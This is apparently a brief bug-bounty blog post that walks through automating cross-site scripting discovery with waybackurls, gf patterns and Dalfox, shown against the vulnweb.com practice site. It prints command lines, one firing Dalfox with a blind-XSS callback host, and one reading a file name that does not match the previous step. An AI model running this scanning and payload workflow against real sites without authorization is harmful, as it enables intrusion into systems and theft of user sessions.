Hello Everyone! 😄

Hope you all are good.

Automating Stuff is always fun so Why not XSS. All you need is “GO Lang” installed on your machine and you are ready to go.

• GF by TomNomNom
• GF Patterns by Shiv Chouhan
• WayBackURLs by TomNomNom
• Dalfox by HAHWUL

• After Installation of all above mentioned tools, Choose your Target. Let’s use “http://testphp.vulnweb.com/” for demonstration purposes.
• Use Waybackurls to fetch URL’s for the chosen target and save the Output in a text file.

echo “testphp.vulnweb.com” | waybackurls | tee testphp.txt

• Use GF Patterns to find URLs that give you XSS and Use sed command to get our URLs ready for the Dalfox

cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt

• Time to fire Dalfox and start finding XSS.

dalfox file testxss.txt -b tigv2.xss.ht pipe

• Make sure you replace my Blind XSS Hunter Payload with that of yours.

Check out the Bash Script to automate the workflow.